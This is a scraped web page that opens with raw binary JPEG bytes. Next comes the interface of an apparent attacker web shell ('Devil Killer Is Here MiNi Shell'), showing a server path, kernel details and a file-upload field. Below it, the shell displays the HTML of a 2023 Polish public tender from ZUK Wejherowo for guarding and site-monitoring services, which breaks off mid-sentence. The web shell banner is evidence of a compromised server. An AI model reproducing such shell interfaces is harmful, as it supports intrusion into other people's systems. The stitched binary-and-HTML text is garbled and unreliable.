JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230215/0009597301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Ochrona osób i mienia ZUK w Wejherowie Sp. z o.o., usługa monitorowania zewnętrznego obiektu i terenu składowiska Rybska Karczma oraz EKOFABRYKI wraz z interwencyjnym sprawdzaniem obiektów. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Usług Komunalnych w Wejherowie Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 221803127</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Obrońców Helu 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wejherowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">58/676-95-20</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">58/676-95-21</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zukwejherowo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zukwejherowo.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Ochrona osób i mienia ZUK w Wejherowie Sp. z o.o., usługa monitorowania zewnętrznego obiektu i terenu składowiska Rybska Karczma oraz EKOFABRYKI wraz z interwencyjnym sprawdzaniem obiektów. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-946109f0-ad11-11ed-9236-36fed59ea7dd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00095973</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zukwejherowo.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu, w<br/>szczególności składanie ofert, wszelkich oświadczeń, wniosków, zawiadomień, wymiana informacji<br/>oraz przekazywanie dokumentów między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków<br/>określonych w ustawie Pzp, odbywa się przy użyciu Platformy Zakupowej Zamawiającego pod<br/>adresem: https://zukwejherowo.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Ogólne<br/>zasady korzystania z Platformy, z zastrzeżeniem ust. 2:<br/>1) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Platformy na subdomenie<br/>https://zukwejherowo.ezamawiajacy.pl/servlet/HomeServlet lub https://oneplace.marketplanet.pl,<br/>2) Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony<br/>https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do<br/>założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego;<br/>podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>regulamin, klika polecenie „zarejestruj się”,<br/>3) rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca<br/>Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia oferty w postaci<br/>elektronicznej; Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma<br/>informację, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować się<br/>pod numerem telefonu podanym w ww. potwierdzeniu,<br/>4) po założeniu konta Wykonawca ma możliwość złożenia oferty w postępowaniu.<br/>2. Zamawiający określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż<br/>512 kb/s,<br/>2) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej<br/>w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>3. Zamawiający dopuszcza przesyłanie plików o wielkości do 100 MB.<br/>4. Zalecenia Zamawiającego dotyczące:<br/>1) kwalifikowanego podpisu elektronicznego:<br/>a) dla dokumentów w formacie .pdf zaleca się podpis formatem PAdES (PDF advanced electronic<br/>signature),<br/>b) dla dokumentów w formacie innym niż .pdf zaleca się podpis formatem XAdES (HML advanced<br/>electronic signature),<br/>2) podpisu zaufanego :<br/>a) wielkość pliku nie może przekraczać 10 MB,<br/>b) dla dokumentów w formacie .pdf zaleca się podpis formatem PAdES; Podpisany plik ma<br/>rozszerzenie .pdf,<br/>c) dla dokumentów w formacie innym niż .pdf zaleca się podpis formatem XAdES. Podpisany plik ma<br/>rozszerzenie .xml,<br/>3) podpisu osobistego :<br/>a) w przypadku wykorzystania aplikacji eDO Atp (obsługuje tylko dokumenty w formacie .pdf) na<br/>telefonach z obsługą technologii NFC wielkość dokumentów nie może przekroczyć 5MB,<br/>b) dla dokumentów w formacie .pdf zaleca się podpis wewnętrzny otoczony,<br/>c) dokumenty w formacie innym niż .pdf zaleca się podpisywać podpisem zewnętrznym lub<br/>otaczającym<br/>4) Po podpisaniu plików a przed ich załączeniem na Platformę zaleca się dokonanie weryfikacji<br/>kompletności i poprawności wszystkich złożonych podpisów (w szczególności gdy dokument został<br/>podpisany przez kilku reprezentantów lub przy wykorzystaniu różnych podpisów). W przypadku<br/>korzystania z wariantu składania podpisów zewnętrznych konieczne jest załączenie na Platformę<br/>dwóch plików, tj. pliku podpisywanego i pliku zawierającego podpis.<br/>5. Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.:<br/>1) plik/pliki oferty załączony/e przez Wykonawcę na Platformie i zapisany/e, widoczny/e jest/są na<br/>Platformie jako zaszyfrowany/e – format kodowania UTF8. Możliwość otworzenia pliku/ów dostępna<br/>jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert,<br/>2) oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss)<br/>generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (dalej: „rozporządzenie 2016/679”), ZUK w Wejherowie Sp. z .o.o.<br/>informuje, że:<br/>1. administratorem Pani/Pana danych osobowych jest ZUK w Wejherowie Sp. z o.o., ul. Obrońców Helu 1, 84-200 Wejherowo,<br/>2. administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod<br/>adresem e-mail: iod@ekozuk.pl,<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c rozporządz. 2016/679 w<br/>celu związanym z przedm. postępow. o udzielenie zam. publ., prowadzonym w trybie podstawowym<br/>bez przeprowadzenia negocjacji,<br/>4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ustawy Pzp,<br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie zam. publ.<br/>6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisanych ustawy Pzp, związanym z udziałem w<br/>postępowaniu o udzielenie zam. publ.<br/>7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w<br/>sposóbzautomatyzowany, stosownie do art. 22 rozporządz. 2016/679,<br/>8. posiada Pani/Pan:<br/>1) na podstawie art. 15 rozporządz. 2016/679 prawo dostępu do danych osobowych Pani/Pana<br/>dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora<br/>niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych<br/>informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty<br/>postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty<br/>zakończonego postępowania o udzielenie zamówienia),<br/>2) na podstawie art. 16 rozporządz. 2016/679 prawo do sprostowania Pani/Pana danych<br/>osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zam. publ. ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie<br/>może naruszać integralności protokołu oraz jego<br/>załączników),<br/>3) na podstawie art. 18 rozporządz. 2016/679 prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zam.<br/>publ. lub konkursu oraz przypadków,<br/>o których mowa w art. 18 ust. 2 rozporządz. 2016/679 (prawo do ograniczenia przetwarzania nie ma<br/>zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony<br/>prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego),<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy rozporządzenia<br/>2016/679,<br/>9. nie przysługuje Pani/Panu:<br/>1) w związku z art. 17 ust. 3 lit. b, d lub e rozporządz. 2016/679 prawo do usunięcia danych<br/>osobowych,<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 rozporządz. 2016/679,<br/>3) na podstawie art. 21 rozporządzenia 2016/679 prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c<br/>rozporządzenia 2016/679,<br/>4) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z<br/>rozporządzeniem 2016/679 przetwarzanie Pani/Pana danych osobowych przez administratora.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DKZ/02/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Podstawowym przedmiotem zamówienia jest świadczenie na rzecz Zamawiającego przy<br/>pomocy pracowników ochrony usługi stałej, bezpośredniej ochrony fizycznej osόb i mienia<br/>należącego do Zamawiającego oraz usługi monitorowania zewnętrznego obiektu i terenu<br/>Zamawiającego:<br/>1) baza Zakładu Usług Komunalnych w Wejherowie Sp. z o.o,. ul. Obrońców Helu 1:<br/>a) ochrona fizyczna w dni powszednie od godz. 15.00 do 7.00 (16h),<br/>b) ochrona fizyczna w weekend od godz. 15.00 w piątek do godz. 7.00<br/>w poniedziałek,<br/>c) ochrona fizyczna w dni świąteczne 24 h,<br/>2) składowisko Rybska Karczma, Rybno, gm. Gniewino - monitoring zewnętrznego obiektu<br/>i terenu składowiska z bazy Zakładu Usług Komunalnych w Wejherowie Sp. z o.o. wraz<br/>z interwencyjnym sprawdzaniem obiektu,<br/>3) EKOFABRYKA, Wejherowo (wjazd od ul. Fabrycznej 10 i Ekologicznej 7) – monitoring<br/>zewnętrzny obiektu i terenu EKOFABRYKI z bazy Wykonawcy wraz z interwencyjnym<br/>sprawdzaniem obiektu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zakres ilościowy przedmiotu zamówienia jest zakresem szacunkowym określonym przez<br/>Zamawiającego z należytą starannością. Z racji na charakter prowadzonej działalności,<br/>Zamawiający nie może zapewnić realizacji zamówienia w zakresie opisanym w dokumentacji<br/>przetargowej. Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji określonego<br/>w art. 441 ust. 1 ustawy:<br/>1) Prawo opcji jest uprawnieniem Zamawiającego, z którego będzie mógł skorzystać w ramach<br/>realizacji umowy. W przypadku nie skorzystania z prawa opcji, Wykonawcy nie przysługują<br/>żadne roszczenia z tego tytułu.<br/>2) Realizacja prawa opcji polegać będzie na ewentualnym zwiększeniu maksymalnie o 1200<br/>ilości godzin ochrony fizycznej osób i mienia, usługi monitorowania zewnętrznego obiektu<br/>i terenu składowiska Rybska Karczma oraz usługi monitorowania zewnętrznego obiektu<br/>i terenu EKOFABRYKI, przewidzianych w opisie przedmiotu zamówienia podstawowego.<br/>3) Zamawiający będzie mógł skorzystać z prawa opcji w sytuacji, gdy wykorzystane zostaną<br/>ilości godzin pierwotnie przewidziane dla przedmiotu zamówienia podstawowego, w okresie nie przekraczającym terminu, na który została zawarta umowa.<br/>4) Prawo opcji realizowane będzie na takich samych warunkach jak zamówienie podstawowe.<br/>5) Stawka za jedną roboczogodzinę objętą opcją będzie taka sama, jak dla zamówienia<br/>podstawowego.<br/>6) Warunkiem skorzystania z prawa opcji jest złożenie przez Zamawiającego oświadczenia woli o skorzystaniu z prawa opcji. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie pracowników Wykonawcy przewidzianych do realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas przyjazdu grupy interwencyjnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące:<br/>1) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej -<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada uprawnienia do<br/>prowadzenia określonej działalności zawodowej tj. ważną koncesję wydaną przez Ministra<br/>właściwego do spraw wewnętrznych, na prowadzenie działalności w zakresie objętym<br/>zamówieniem (ustawa z dnia 22 sierpnia 1997 r.<br/>o ochronie osób i mienia t.j. Dz.U. z 2021, poz. 1995),<br/>2) sytuacji ekonomicznej lub finansowej - Zamawiający uzna warunek za spełniony, jeżeli<br/>Wykonawca wykaże, że posiada zdolność ekonomiczną lub finansową tj.: przedstawi polisę<br/>ubezpieczeniową potwierdzającą ubezpieczenie Wykonawcy od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności na sumę gwarancyjną co najmniej 50.000,00 zł.<br/>Ubezpieczenie powinno dotyczyć odpowiedzialności cywilnej za szkody wynikłe z czynów<br/>niedozwolonych (OC delikt) oraz odpowiedzialności cywilnej z tytułu niewykonania lub<br/>nienależytego wykonania umowy (OC kontrakt),<br/>3) zdolności technicznej lub zawodowej - Zamawiający uzna warunek za spełniony, jeżeli<br/>Wykonawca wykaże, że<br/>a) w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy –<br/>w tym okresie, wykonał należycie co najmniej 2 usługi ochrony osób i mienia, realizowane w<br/>budynkach użyteczności publicznej, trwające nieprzerwalnie przez okres nie krótszy niż 6<br/>kolejnych miesięcy kalendarzowych oraz o wartości co najmniej 50.000,00 zł brutto.,<br/>b) dysponuje co najmniej 5 osobami skierowanymi do realizacji przedmiotowego zamówienia i<br/>odpowiedzialnymi za świadczenie usług ochrony, wpisanymi na listę kwalifikowanych<br/>pracowników ochrony fizycznej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wzywa Wykonawcę,<br/>którego oferta została najwyżej oceniona, do złożenia<br/>w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia podmiotowych środków<br/>dowodowych, chyba, że Zamawiający jest w posiadaniu lub ma dostęp do tych podmiotowych środków<br/>dowodowych, tj.:<br/>1) aktualnej koncesji na prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia w<br/>zakresie i formie zgodnej z charakterem zamówienia w przedmiotowym postępowaniu<br/>2) polisy ubezpieczeniowej od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na<br/>sumę gwarancyjną co najmniej 50.000 zł. Ubezpieczenie powinno dotyczyć odpowiedzialności cywilnej<br/>za szkody wynikłe z czynów niedozwolonych (OC delikt) oraz odpowiedzialności cywilnej z tytułu niewykonania lub nienależytego wykonania umowy (OC kontrakt),<br/>3) wykaz wykonanych usług (zgodnie ze wzorem stanowiącym załącznik nr 5 do SWZ),<br/>a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych,<br/>w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały<br/>wykonane lub są wykonywane,<br/>4) dowody określające, czy usługi ujęte w wykazie usług, o którym mowa w pkt 3, zostały wykonane lub<br/>są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone 